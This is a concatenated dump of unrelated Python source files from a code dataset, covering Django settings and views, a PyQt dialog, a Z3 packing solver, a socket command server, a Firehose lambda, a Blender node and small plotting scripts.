summation_X.append(result)\n\nprint(summation_X)\nprint(len(X[0]))\n\n#for i in y:\n    #for j in X[i]:\n        #print i,\" \",j\n    #print(X[:,i])\n# for x in y:\n#     print \"y: \",x\n#     print \"x: \", X[:,x]\n# import some data to play with\n# iris = datasets.load_iris()\n# X = iris.data[:, :3]  # we only take the first two features.\n# y = iris.target\n\nx_min, x_max = min(summation_X) , max(summation_X)\ny_min, y_max = y.min(), y.max()\nfor i in y:\n    summation_Y.append((y_min+y_max)/2)\nplt.figure(2, figsize=(8, 6))\nplt.clf()\nprint(len(summation_X),\" \",len(y))\n#Plot the training points\nplt.scatter(summation_X,summation_Y, c=y, cmap=plt.cm.Set1,\n            edgecolor='k')\nprint(\"max: \",x_max)\nprint(\"min: \",x_min)\n\nplt.xlabel('Uncommon Word Count')\nplt.ylabel(' ')\n\nplt.xlim(x_min, x_max)\nplt.ylim(y_min, y_max)\nplt.xticks(())\nplt.yticks(())\n\n# To getter a better understanding of interaction of the dimensions\n# plot the first three PCA dimensions\nfig = plt.figure(1, figsize=(8, 6))\nax = Axes3D(fig, elev=-150, azim=110)\ncomponents = len(X[0])\nprint(components)\nX_reduced = PCA(n_components=147).fit_transform(X)\nax.scatter(summation_X,0, c=y,\n           cmap=plt.cm.Set1, edgecolor='k',s=40)\nax.set_title(\"First three PCA directions\")\nax.set_xlabel(\"1st eigenvector\")\nax.w_xaxis.set_ticklabels([])\nax.set_ylabel(\"2nd eigenvector\")\nax.w_yaxis.set_ticklabels([])\nax.set_zlabel(\"3rd eigenvector\")\nax.w_zaxis.set_ticklabels([])\n\nplt.show()\n","sub_path":"ClusteringPT/ClusteringPT/plot_iris_dataset.py","file_name":"plot_iris_dataset.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"528121926","text":"from example.page_example import (\n    bar_datazoom_slider,\n    grid_mutil_yaxis,\n    line_markpoint,\n    pie_rosetype,\n    table_base,\n)\nfrom pyecharts.charts import Tab\n\n\ndef tab_base():\n    tab = Tab()\n    tab.add(bar_datazoom_slider(), \"bar-example\")\n    tab.add(line_markpoint(), \"line-example\")\n    tab.add(pie_rosetype(), \"pie-example\")\n    tab.add(grid_mutil_yaxis(), \"grid-example\")\n    tab.add(table_base(), \"table-example\")\n    tab.render()\n","sub_path":"example/tab_example.py","file_name":"tab_example.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"180747764","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom notes import Notebook\nfrom notes.ui.notebookpreviewtreewidget import NotebookPreviewTreeWidget\n\n\nclass NotebookFilterDialog(QDialog):\n\n    def __init__(self, parent=None, notebook: Notebook = None):\n        super(QDialog, self).__init__(parent, Qt.WindowSystemMenuHint | Qt.WindowCloseButtonHint | Qt.WindowTitleHint)\n        self.notebook: Notebook = notebook.shallow_clone()\n        self.setWindowTitle(\"Filter notes\")\n        self.filteredNoteBook: Notebook = self.notebook.shallow_clone()\n        self.setMinimumWidth(200)\n\n        pixmap = QPixmap(32, 32)\n        pixmap.fill(Qt.transparent)\n        # self.setWindowIcon(QIcon(\"icons/insert_link.png\"))\n\n        # self.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint)\n\n        self.initUI()\n\n    def initUI(self):\n\n        layout = QVBoxLayout()\n\n        self.noteFilterEdit = QLineEdit()\n        self.noteFilterEdit.setPlaceholderText(\"Enter a filtered expression\")\n\n        # self.tagsFilterEdit = QLineEdit()\n        # self.tagsFilterEdit.setPlaceholderText(\"Enter a tags separated by ','\")\n\n        self.tagsListWidget = QListWidget()\n\n        for tag in self.notebook.tag_base.tags:\n            item = QListWidgetItem()\n            item.setText(tag)\n            item.setFlags(item.flags() | Qt.ItemIsUserCheckable)\n            item.setCheckState(Qt.Unchecked)\n\n            self.tagsListWidget.addItem(item)\n\n        self.notePreviewWidget = NotebookPreviewTreeWidget()\n        self.notePreviewWidget.load_notebook(self.filteredNoteBook)\n\n        layout.addWidget(self.noteFilterEdit)\n        # layout.addWidget(self.tagsFilterEdit)\n\n        if self.tagsListWidget.count() > 0:\n            layout.addWidget(self.tagsListWidget)\n        layout.addWidget(self.notePreviewWidget)\n\n        self.filterButton = QPushButton(\"Filter\")\n        self.filterButton.clicked.connect(self.filter)\n\n        layout.addWidget(self.filterButton)\n\n        buttons = QDialogButtonBox(\n            QDialogButtonBox.Ok | QDialogButtonBox.Cancel,\n            Qt.Horizontal, self)\n\n        buttons.setCenterButtons(True)\n        buttons.accepted.connect(self.accept)\n        buttons.rejected.connect(self.reject)\n        layout.addWidget(buttons, Qt.AlignCenter)\n\n        self.setLayout(layout)\n\n    def getTags(self):\n        tags = []\n        for i in range(self.tagsListWidget.count()):\n            item = self.tagsListWidget.item(i)\n            if item.checkState() == Qt.Checked:\n                tags.append(item.text())\n        return tags\n\n    def filter(self):\n        noteFilter = self.noteFilterEdit.text()\n        tagsFilter = self.getTags()\n        self.filteredNoteBook: Notebook = self.notebook.shallow_clone()\n        self.filteredNoteBook.filter_notes(noteFilter, tagsFilter)\n        self.filteredNoteBook.remove_empty_sections()\n        self.notePreviewWidget.load_notebook(self.filteredNoteBook)\n","sub_path":"notes/ui/notebookfilterdialog.py","file_name":"notebookfilterdialog.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"551002539","text":"import os\nfrom .default import BASE_DIR, LOCAL\n\n\nSTATICFILES_FINDERS = (\n    'django.contrib.staticfiles.finders.FileSystemFinder',\n    'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\nSTATICFILES_DIRS = [\n    os.path.join(BASE_DIR, 'static'),\n]\n\nFILE_UPLOAD_PERMISSIONS = 0o644\n\nif not os.environ.get('AWS_ACCESS_KEY_ID', None):\n    # serve media/static files through local server\n    STATIC_URL = '/static/' if not LOCAL else '/local-static/'\n    STATIC_ROOT = os.path.join(\n        BASE_DIR,\n        '.static/'\n    )\n\n    MEDIA_ROOT = os.path.join(BASE_DIR, '.media/')\n    MEDIA_URL = os.environ.get('MEDIA_URL', '/media/')\n    USING_S3 = False\nelse:\n    # serve media/static files through amazon s3\n    AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\n    AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n    AWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME')\n    AWS_QUERYSTRING_AUTH = False\n\n    STATICFILES_LOCATION = 'static'\n    STATIC_URL = 'https://s3.amazonaws.com/{}/{}/'.format(\n        AWS_STORAGE_BUCKET_NAME, STATICFILES_LOCATION)\n    STATICFILES_STORAGE = 'centro59.storages.StaticStorage'\n\n    MEDIAFILES_LOCATION = 'media'\n    MEDIA_URL = 'https://s3.amazonaws.com/{}/{}/'.format(\n        AWS_STORAGE_BUCKET_NAME, MEDIAFILES_LOCATION)\n    DEFAULT_FILE_STORAGE = 'centro59.storages.MediaStorage'\n\n    AWS_S3_OBJECT_PARAMETERS = {\n        'CacheControl': 'max-age=86400',\n    }\n\n    USING_S3 = True\n\nVERSATILEIMAGEFIELD_SETTINGS = {\n    'cache_length': 2592000,\n    'cache_name': 'versatileimagefield_cache',\n    'jpeg_resize_quality': 85,\n    'sized_directory_name': '__sized__',\n    'filtered_directory_name': '__filtered__',\n    'placeholder_directory_name': '__placeholder__',\n    'create_images_on_demand': False,\n    'image_key_post_processor': None,\n    'progressive_jpeg': True\n}\n\nVERSATILEIMAGEFIELD_USE_PLACEHOLDIT = True\nVERSATILEIMAGEFIELD_RENDITION_KEY_SETS = {\n    'profile_avatar': [\n        ('full_size', 'url'),\n        ('crop__400x400', 'crop__400x400'),\n        ('crop__280x280', 'crop__280x280'),\n        ('crop__128x128', 'crop__128x128'),\n        ('crop__44x44', 'crop__44x44'),\n        ('crop__42x42', 'crop__42x42'),\n    ],\n    'logo': [\n        ('full_size', 'url'),\n        ('crop__400x400', 'crop__400x400'),\n        ('crop__280x280', 'crop__280x280'),\n        ('crop__128x128', 'crop__128x128'),\n        ('crop__44x44', 'crop__44x44'),\n        ('crop__42x42', 'crop__42x42'),\n    ]\n}\n","sub_path":"cambasBlog/settings/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"625764185","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.formats import number_format\n\nuf_list = (\n    ('AC', 'Acre'),\n    ('AL', 'Alagoas'),\n    ('AM', 'Amazonas'),\n    ('AP', u'Amapá'),\n    ('BA', 'Bahia'),\n    ('CE', u'Ceará'),\n    ('DF', u'Brasília'),\n    ('ES', u'Espírito Santo'),\n    ('GO', u'Goiás'),\n    ('MA', u'Maranhão'),\n    ('MG', 'Minas Gerais'),\n    ('MS', 'Mato Grosso do Sul'),\n    ('MT', 'Mato Grosso'),\n    ('PA', u'Pará'),\n    ('PB', u'Paraíba'),\n    ('PE', 'Pernambuco'),\n    ('PI', u'Piauí'),\n    ('PR', u'Paraná'),\n    ('RJ', 'Rio de Janeiro'),\n    ('RN', 'Rio Grande do Norte'),\n    ('RO', u'Rondônia'),\n    ('RR', 'Roraima'),\n    ('RS', 'Rio Grande do Sul'),\n    ('SC', 'Santa Catarina'),\n    ('SE', 'Sergipe'),\n    ('SP', u'São Paulo'),\n    ('TO', 'Tocantins'),\n)\n\n\nclass TimeStampedModel(models.Model):\n    created_at = models.DateTimeField(\n        _('criado em'), auto_now_add=True, auto_now=False)\n    modified_at = models.DateTimeField(\n        _('modificado em'), auto_now_add=False, auto_now=True)\n\n    class Meta:\n        abstract = True\n\n\nclass Company(TimeStampedModel):\n    name = models.CharField(_('nome'), max_length=30)\n    cnpj = models.CharField(_('CNPJ'), max_length=19, unique=True)\n    ie = models.CharField(_('IE'), max_length=15, blank=True)\n    address = models.CharField(_(u'endereço'), max_length=80, blank=True)\n    address_number = models.PositiveIntegerField(_(u'número'), blank=True)\n    district = models.CharField(_('bairro'), max_length=80, blank=True)\n    city = models.ForeignKey(\n        'City', related_name='company_city', verbose_name=_('cidade'))\n    uf = models.CharField(_('UF'), max_length=2, choices=uf_list)\n    cep = models.CharField(_('CEP'), max_length=9, blank=True)\n    person = models.ForeignKey(\n        'Person', related_name='company_person', verbose_name=_('contato'), blank=True)\n\n    class Meta:\n        ordering = ['name']\n        verbose_name = \"empresa\"\n        verbose_name_plural = \"empresas\"\n\n    def __str__(self):\n        return \" \".join([self.name, self.cnpj])\n\n    def get_company_detail_url(self):\n        return u\"/companys/%i\" % self.id\n\n\nclass City(models.Model):\n    city = models.CharField(_('cidade'), max_length=80)\n    uf = models.CharField(_('UF'), max_length=2, choices=uf_list)\n\n    class Meta:\n        ordering = ['city']\n        verbose_name = \"cidade\"\n        verbose_name_plural = \"cidades\"\n\n    def __str__(self):\n        return self.city\n\n\nclass Person(TimeStampedModel):\n    firstname = models.CharField(_('nome'), max_length=30)\n    lastname = models.CharField(_('sobrenome'), max_length=30)\n    email = models.EmailField(_('e-mail'))\n    phone = models.CharField(_('fone'), max_length=18)\n\n    class Meta:\n        ordering = ['firstname']\n        verbose_name = \"pessoa\"\n        verbose_name_plural = \"pessoas\"\n\n    def __str__(self):\n        return u\"%s %s\" % (self.firstname, self.lastname)\n    full_name = property(__str__)\n","sub_path":"myproject/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"474535482","text":"#!/usr/bin/python\n\n#  Tkinter tutorial\n#\n\nfrom Tkinter import *\n\nroot = Tk()\nroot.title('Basic Text')\n\ncw  =   200\nch  =   20\n\ncanvas1=Canvas(root,width=cw,height=ch,background='white')\ncanvas1.grid(row=0,column=1)\n\nxy = 120,10\n\ncanvas1.create_text(xy,text='This is just test for text')\n\nroot.mainloop()\n","sub_path":"tkinter/text_using_tkinter.py","file_name":"text_using_tkinter.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"559043432","text":"import json\nimport base64\nimport traceback\nfrom datetime import datetime\n\ndef handler(event, context):\n    output = []\n    for record in event[\"records\"]:\n        try:\n            # Base64 decode record data and JSON parse data\n            entry = base64.b64decode(record[\"data\"]).decode(\"utf-8\")\n            parsed_entry = json.loads(entry)\n            payload = parsed_entry[\"detail\"][\"data\"]\n            payload[\"timestamp\"] = payload[\"date\"]\n            del payload[\"date\"]\n            payload[\"details\"] = json.dumps(payload[\"details\"])\n            \n            # Add new line to payload string, Base64 encode payload and return transformed record\n            decoded_data = json.dumps(payload) + \"\\n\"\n            encoded_data = base64.b64encode(decoded_data.encode(\"utf-8\")).decode(\"utf-8\")\n            output.append({\n                \"recordId\": record[\"recordId\"],\n                \"result\": \"Ok\",\n                \"data\": encoded_data,\n            })\n        except:\n            # If an error occurs, print error and return record as having failed processing\n            traceback.print_exc()\n            output.append({\n                \"recordId\": record[\"recordId\"],\n                \"result\": \"ProcessingFailed\",\n                \"data\": record[\"data\"],\n            })\n    return {\n        \"records\": output\n    }","sub_path":"lambdas/firehose-transform/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"202470554","text":"import _thread\nimport youtube_dl\n\n\nclass PlayerPlaylist:\n    def __init__(self, channel, voice_client, source):\n        self.channel = channel\n        self.voice_client = voice_client\n        self.source = source\n        self.urls = []\n        self.completed = False\n        self.youtube_dl_options = dict(\n            ignoreerrors=True,\n            noplaylist=False,\n            default_search=\"auto\",\n            quiet=True,\n            nocheckcertificate=True,\n            abortonerror=False\n        )\n        try:\n            _thread.start_new_thread(self.download_playlist_info, ())\n        except Exception as e:\n            print(e)\n            pass\n\n    def download_playlist_info(self):\n        with youtube_dl.YoutubeDL(self.youtube_dl_options) as ytdl:\n            ytdl_playlist = ytdl.extract_info(self.source, download=False)\n        for video in ytdl_playlist['entries']:\n            if video is not None:\n                self.urls.append(video['webpage_url'])\n        self.completed = True\n","sub_path":"PlayerPlaylist.py","file_name":"PlayerPlaylist.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"166463739","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\nimport time\nfrom z3 import *\nfrom itertools import combinations\nfrom typing import Sequence\n\n\n# Cumulative constraint\ndef cumulative(solver, S: Sequence, D: Sequence, R: Sequence, C: int):\n    # Iterate over the durations\n    for u in D:\n        solver.add(\n            Sum(\n                [If(And(S[i] <= u, u < S[i] + D[i]), R[i], 0) for i in range(len(S))]\n            ) <= C)\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-i\", \"--in_path\", help=\"Path to the file constaining the input instance\", required=True, type=str)\n    parser.add_argument(\"-o\", \"--out_path\", help=\"Path to the directory that will contain the output solution\", required=True, type=str)\n    parser.add_argument(\"-t\", \"--timeout\", help=\"Timeout in seconds (300 by default)\", required=False, type=int)\n    parser.add_argument(\"-ic\", \"--implied\", help=\"Don't use implied constraints (they're used by default)\", action='store_false')\n    args = parser.parse_args()\n    \n    # Read the input instance\n    input_filename = args.in_path\n    w, h, n, DX, DY = None, None, None, None, None\n    with open(input_filename, 'r') as f_in:\n        lines = f_in.read().splitlines()\n\n        split = lines[0].split(' ')\n        w = int(split[0])\n        h = int(split[1])\n\n        n = int(lines[1])\n\n        DX = []\n        DY = []\n\n        for i in range(int(n)):\n            split = lines[i + 2].split(' ')\n            DX.append(int(split[0]))\n            DY.append(int(split[1]))\n\n    # Define solver and base model\n    solver = Solver()\n    XY = [(Int(f'XY_{i}_0'), Int(f'XY_{i}_1')) for i in range(n)]\n\n    # Define auxiliary variables\n    R = [Bool(f'R_{i}') for i in range(n)]  # rotation\n    TRUE_DX = [If(And(DX[i] != DY[i], R[i]), DY[i], DX[i]) for i in range(n)]  # actual X dimension\n    TRUE_DY = [If(And(DX[i] != DY[i], R[i]), DX[i], DY[i]) for i in range(n)]  # actual Y dimension\n\n    print('Adding constraints...')\n\n    # Non-overlapping constraint\n    for (i, j) in combinations(range(n), 2):\n        solver.add(Or(XY[i][0] + TRUE_DX[i] <= XY[j][0], \n                    XY[j][0] + TRUE_DX[j] <= XY[i][0],\n                    XY[i][1] + TRUE_DY[i] <= XY[j][1],\n                    XY[j][1] + TRUE_DY[j] <= XY[i][1]))\n\n    # Boundaries consistency constraint\n    for i in range(n):\n        solver.add(XY[i][0] >=0)\n        solver.add(XY[i][1] >= 0)\n        solver.add(XY[i][0] + TRUE_DX[i] <= w)\n        solver.add(XY[i][1] + TRUE_DY[i] <= h)\n\n    if args.implied:\n        # Implied constraints\n        cumulative(solver,\n                S=list(map(lambda t: t[0], XY)),  # take x coordinates\n                D=TRUE_DX,\n                R=TRUE_DY,\n                C=h)\n        cumulative(solver,\n                S=list(map(lambda t: t[1], XY)),  # take y coordinates\n                D=TRUE_DY,\n                R=TRUE_DX,\n                C=w)\n    else:\n        print('Implied constraints disabled.')\n\n    # Set timeout for solver (in msec)\n    timeout = args.timeout * 1000 if args.timeout is not None else 300000\n    solver.set('timeout', timeout)\n\n    print('Checking the model...')\n    start_time = time.time()\n    res = solver.check()\n    elapsed_time = time.time() - start_time\n    print(f'Elapsed: {elapsed_time:.3f} s')\n\n    if res == sat:\n        print('The instance is SAT.')\n        model = solver.model()\n\n        xy = [(model[XY[i][0]], model[XY[i][1]]) for i in range(n)]\n        r = [model[R[i]] for i in range(n)]\n\n        # Write solution to file\n        instance_name = input_filename.split('/')[-1]\n        instance_name = instance_name[:len(instance_name) - 4]\n        output_filename = os.path.join(args.out_path, instance_name + '-out.txt')\n        with open(output_filename, 'w') as f_out:\n            f_out.write(f'{w} {h}\\n')\n            f_out.write(f'{n}\\n')\n            for i in range(n):\n                f_out.write(f'{DY[i] if r[i] else DX[i]} {DX[i] if r[i] else DY[i]}\\t{xy[i][0]} {xy[i][1]}\\n')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"SMT/src/pwp-rotation.py","file_name":"pwp-rotation.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"177263563","text":"import unittest\nfrom here.geocoder import *\nimport requests_mock\n\n\nclass TestGeocoder(unittest.TestCase):\n    @requests_mock.mock()\n    def test_geocode(self, m):\n        geocoder = Geocoder()\n\n        test_address = \"AV ANTONIO MUNHOZ BONILHA, 132, Sao Paulo, Brasil\"\n\n        endpoint = geocoder.geocode_url + \"?app_id={0}&app_code={1}&gen={2}&searchtext={3}\" \\\n            .format(geocoder.app_id,\n                    geocoder.app_code,\n                    9,\n                    test_address)\n\n        m.get(endpoint,\n              content=open('here/tests/data/geocoder.json').read())\n\n        self.assertEqual(geocoder.geocode(test_address), (-23.50286, -46.68465))\n","sub_path":"here/tests/test_geocoder.py","file_name":"test_geocoder.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"511365377","text":"import bpy, colorsys\nfrom bpy.props import *\nfrom ... events import executionCodeChanged\nfrom ... base_types.node import AnimationNode\n\n# using linear conversion here, unlike BL colorpicker hsv/hex\n# BL Color() funcion does this also and has only rgb+hsv, so we'l use colorsys\n# only hsv/hex in the colorpicker are gamma corrected for colorspaces\n# we shall not use other functions, till they are in context (BL color space)\n\ntargetTypeItems = [\n    (\"RGB\", \"RGB\", \"Red, Green, Blue\"),            \n    (\"HSV\", \"HSV\", \"Hue, Saturation, Value\"),      \n    (\"HSL\", \"HSL\", \"Hue, Saturation, Lightness\"),  \n    (\"YIQ\", \"YIQ\", \"Luma, Chrominance\")]           \n\nclass SeparateColorNode(bpy.types.Node, AnimationNode):\n    bl_idname = \"an_SeparateColorNode\"\n    bl_label = \"Separate Color\"\n    \n    def targetTypeChanged(self, context):\n        self.updateHideStatus()\n        executionCodeChanged()\n        \n    targetType = EnumProperty(name = \"Target Type\", items = targetTypeItems,\n                                    default = \"RGB\", update = targetTypeChanged)\n\n    def create(self):\n        self.inputs.new(\"an_ColorSocket\", \"Color\", \"color\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Red\", \"r\")\n        self.outputs.new(\"an_FloatSocket\", \"Green\", \"g\")\n        self.outputs.new(\"an_FloatSocket\", \"Blue\", \"b\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Hue\", \"h\")\n        self.outputs.new(\"an_FloatSocket\", \"Saturation\", \"s\")\n        self.outputs.new(\"an_FloatSocket\", \"Value\", \"v\")\n        \n        #same H, S (attention HLS/HSL order! using HSL for sockets, but function does hls)\n        self.outputs.new(\"an_FloatSocket\", \"Lightness\", \"l\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Y Luma\", \"y\")\n        self.outputs.new(\"an_FloatSocket\", \"I In phase\", \"i\")\n        self.outputs.new(\"an_FloatSocket\", \"Q Quadrature\", \"q\")\n        \n        self.outputs.new(\"an_FloatSocket\", \"Alpha\", \"alpha\")\n        self.updateHideStatus()\n        \n    def draw(self, layout):\n        layout.prop(self, \"targetType\", expand = True)\n        \n    def drawLabel(self):\n        return \"--> \" + self.targetType + \"a (Linear)\"\n    \n    def getExecutionCode(self):\n        yield \"r = g = b = h = s = v = l = y = i = q = 0\"\n        if self.targetType == \"RGB\":    yield \"r, g, b = color[0], color[1], color[2]\"\n        elif self.targetType == \"HSV\":  yield \"h, s, v = colorsys.rgb_to_hsv(color[0], color[1], color[2])\"\n        elif self.targetType == \"HSL\":  yield \"h, l, s = colorsys.rgb_to_hls(color[0], color[1], color[2])\"#attention to the HLS order!\n        elif self.targetType == \"YIQ\":  yield \"y, i, q = colorsys.rgb_to_yiq(color[0], color[1], color[2])\"\n        yield \"alpha = color[3]\"\n    \n    def getUsedModules(self):\n        return [\"colorsys\"]\n\n    def updateHideStatus(self):\n        for socket in self.outputs[:-1]: socket.hide = True\n\n        if self.targetType == \"RGB\":\n            self.outputs[\"Red\"].hide = False\n            self.outputs[\"Green\"].hide = False\n            self.outputs[\"Blue\"].hide = False\n        elif self.targetType == \"HSV\":\n            self.outputs[\"Hue\"].hide = False\n            self.outputs[\"Saturation\"].hide = False\n            self.outputs[\"Value\"].hide = False\n        elif self.targetType == \"HSL\":\n            self.outputs[\"Hue\"].hide = False\n            self.outputs[\"Saturation\"].hide = False\n            self.outputs[\"Lightness\"].hide = False\n        elif self.targetType == \"YIQ\":\n            self.outputs[\"Y Luma\"].hide = False\n            self.outputs[\"I In phase\"].hide = False\n            self.outputs[\"Q Quadrature\"].hide = False\n","sub_path":"nodes/color/separate_color.py","file_name":"separate_color.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"343341864","text":"import socket, sys\nfrom Framework.Client import *\nfrom Framework.Execution import *\n\n\nclass Server(object):\n    def __init__(self, hostname, port, path=\"bin/\", max_capacity=10, connect_buffer=2, connection_timeout=0.01):\n        self.hostname = hostname\n        self.port = port\n        self.path = path\n        self.max_capacity = max_capacity\n        self.connect_buffer = connect_buffer\n        self.connection_timeout = connection_timeout\n        self.socket = None\n        self.clients = []\n        self.alive = True\n        self.permissions = ROOT\n\n        try:\n            startup_commands = open(self.path + 'startup.txt').readlines()\n            for command in startup_commands:\n                args = command.replace('\\n', '').split(' ')\n                print(run_command(self, self, args[0], args[1:]))\n        except FileNotFoundError:\n            print('No startup file detected!')\n\n    def start(self):\n        try:\n            self.socket = socket.socket()\n            self.socket.setblocking(True)\n            self.socket.settimeout(self.connection_timeout)\n            self.socket.bind((self.hostname, self.port))\n            self.socket.listen(self.connect_buffer)\n        except OSError:\n            print('Operating System Error')\n            sys.exit(1)\n\n        self.run()\n\n    def run(self):\n        while self.alive:\n            try:  # Checks for any clients waiting to connect\n                if len(self.clients) < self.max_capacity:\n                    conn, addr = self.socket.accept()\n                    print(\"Connection from\", addr)\n                    conn.settimeout(self.connection_timeout)\n                    client = Client(conn, addr)\n                    self.clients.append(client)\n            except TimeoutError:\n                pass\n            except OSError:\n                pass\n\n            delete_list = []\n            for client in self.clients:\n                data = b''\n                success = False\n                while True:\n                    try:\n                        data += client.recv(4096)\n                        success = True\n                    except ConnectionError:\n                        delete_list.append(client)\n                        client.disconnect()\n                        print(\"Disconnection by\", client.addr)\n                        success = False\n                        break\n                    except socket.timeout:\n                        break\n\n                data = data.decode()\n                if success:\n                    print(client.get_name() + ': ' + data)\n                    data = data.split(' ')\n                    reply = run_command(self, client, data[0], data[1:])\n                    client.send(reply.encode())\n\n            for client in delete_list:\n                self.clients.remove(client)\n\n    def send(self, client, data):\n        client.send(data)\n\n    def send_to_all(self, data):\n        for client in self.clients:\n            client.send(data)\n\n    def get_permissions(self):\n        return self.permissions\n\n    def get_name(self):\n        return '[Server]'\n\n    def shutdown(self):\n        for client in self.clients:\n            client.disconnect()\n        self.alive = False\n","sub_path":"ges/GCEServer.py","file_name":"GCEServer.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"312018197","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Sum\nfrom django.contrib.auth.models import User\nfrom .models import UserProfile\nfrom .forms import UserProfileForm\n\nfrom blog.models import Post\nfrom recipes.models import Recipe\n\nfrom checkout.models import Order\n\n\n@login_required\ndef profile(request):\n    \"\"\" Display the user's profile \"\"\"\n\n    profile = get_object_or_404(UserProfile, user=request.user)\n    user = get_object_or_404(User, id=request.user.id)\n    posts = Post.objects.all()\n    recipes = Recipe.objects.all()\n\n    if request.method == 'POST':\n        form = UserProfileForm(request.POST, instance=profile)\n        if form.is_valid():\n            form.save()\n            messages.success(request, 'Profile successfully updated!')\n        else:\n            messages.error(request, 'Update failed. Please ensure \\\n                the form is valid.')\n\n    # Populate the form with the user's profile info\n    else:\n        form = UserProfileForm(instance=profile)\n    orders = profile.orders.all().order_by('-pk')\n    user_posts = user.blog_posts.all().order_by('-pk')\n\n    # See all my recipes by vote count first, then newest to oldest\n    user_recipes = user.recipe_posts.all().order_by('-vote_count', '-pk')\n\n    # Get number of votes for the user's published recipes\n    all_votes = user_recipes.aggregate(num_votes=Sum(\n                                       'vote_count')).get('num_votes')\n    template = 'profiles/profile.html'\n    context = {\n        'form': form,\n        'orders': orders,\n        'on_profile_page': True,\n        'posts': posts,\n        'recipes': recipes,\n        'user_posts': user_posts,\n        'user_recipes': user_recipes,\n        'all_votes': all_votes,\n    }\n\n    return render(request, template, context)\n\n\ndef order_history(request, order_number):\n    order = get_object_or_404(Order, order_number=order_number)\n    posts = Post.objects.all().order_by('-pk')\n    recipes = Recipe.objects.all().order_by('-pk')\n\n    messages.warning(request, (\n        f'This is a past confirmation for order number {order_number}.'\n        'A confirmation email was sent on the order date.'\n    ))\n    template = 'checkout/checkout_success.html'\n    context = {\n        'order': order,\n        'posts': posts,\n        'recipes': recipes,\n        'from_profile': True,\n    }\n\n    return render(request, template, context)\n","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"476909938","text":"\"\"\"\nCreates a benchmark by predicting the most popular skus in each category\n\"\"\"\n\nfrom collections import defaultdict\nimport csv\n\nwd = \"../../data/downloaded/small/\"\n\ndef get_popular_skus():\n    \"\"\"Returns a dictionary of the most popular skus in each category\"\"\"\n    with open(wd + \"train.csv\") as infile:\n        reader = csv.reader(infile, delimiter=\",\")\n        reader.next() # burn the header\n\n        categories = defaultdict(lambda: defaultdict(int))\n        for (user, sku, category, query, click_time, query_time) in reader:\n            categories[category][sku] += 1\n\n        for category in categories:\n            categories[category] = sorted(categories[category].items(), \\\n                                          key=lambda x: x[1])\n            categories[category].reverse()\n        return categories\n\ndef make_predictions(categories):\n    \"\"\"Write the predictions out\"\"\"\n    with open(wd + \"test.csv\") as infile:\n        reader = csv.reader(infile, delimiter=\",\")\n        reader.next() # burn the header\n        with open(\"popular_skus.csv\", \"w\") as outfile:\n            writer = csv.writer(outfile, delimiter=\",\")\n            writer.writerow([\"sku\"])\n            for (user, category, query, click_time, query_time) in reader:\n                try:\n                    guesses = [x[0] for x in categories[category][0:5]]\n                    writer.writerow([\" \".join(guesses)])\n                except TypeError: # a category we haven't seen before\n                    writer.writerow([\"0\"])\n\ndef main():\n    \"\"\"Creates the benchmark\"\"\"\n    categories = get_popular_skus()\n    make_predictions(categories)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"popular_skus.py","file_name":"popular_skus.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
